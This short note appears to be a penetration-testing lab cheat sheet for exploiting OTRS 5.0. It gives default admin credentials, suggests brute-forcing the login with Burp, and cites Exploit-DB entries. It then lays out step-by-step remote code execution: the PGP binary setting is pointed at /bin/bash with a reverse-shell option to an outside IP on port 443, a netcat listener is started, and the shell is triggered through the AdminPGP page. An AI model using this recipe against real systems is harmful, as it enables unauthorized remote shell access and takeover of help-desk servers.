OTRS 5.0

Admin console default location: http://10.11.1.38/otrs/index.pl Default user: root@localhost Password: otrs Password can be bruteforced using burp #Exploit https://www.exploit-db.com/exploits/49794 sudo searchsploit -m 43853.txt Instructions: OTRS 5.0.2 PoC: [1]Log in dashboard, navigate to Admin → Sysconfig [2]Just copy and paste the url provided in ExploitDB POC Action=AdminSysConfig;Subaction=Edit;SysConfigSubGroup=Crypt%3A%3APGP;SysConfigGroup=Framework [3]Edit the following PGP=yes PGP::Bin = /bin/bash PGP::Options = -c 'exec bash -i &>/dev/tcp/192.168.119.177/443 <&1' PGP::Trusted Network = Yes [4]Setup a listener on port 443 nc -nvlp 443 [5]Trigger revshell 10.11.1.38/otrs/index.pl?Action=AdminPGP Shell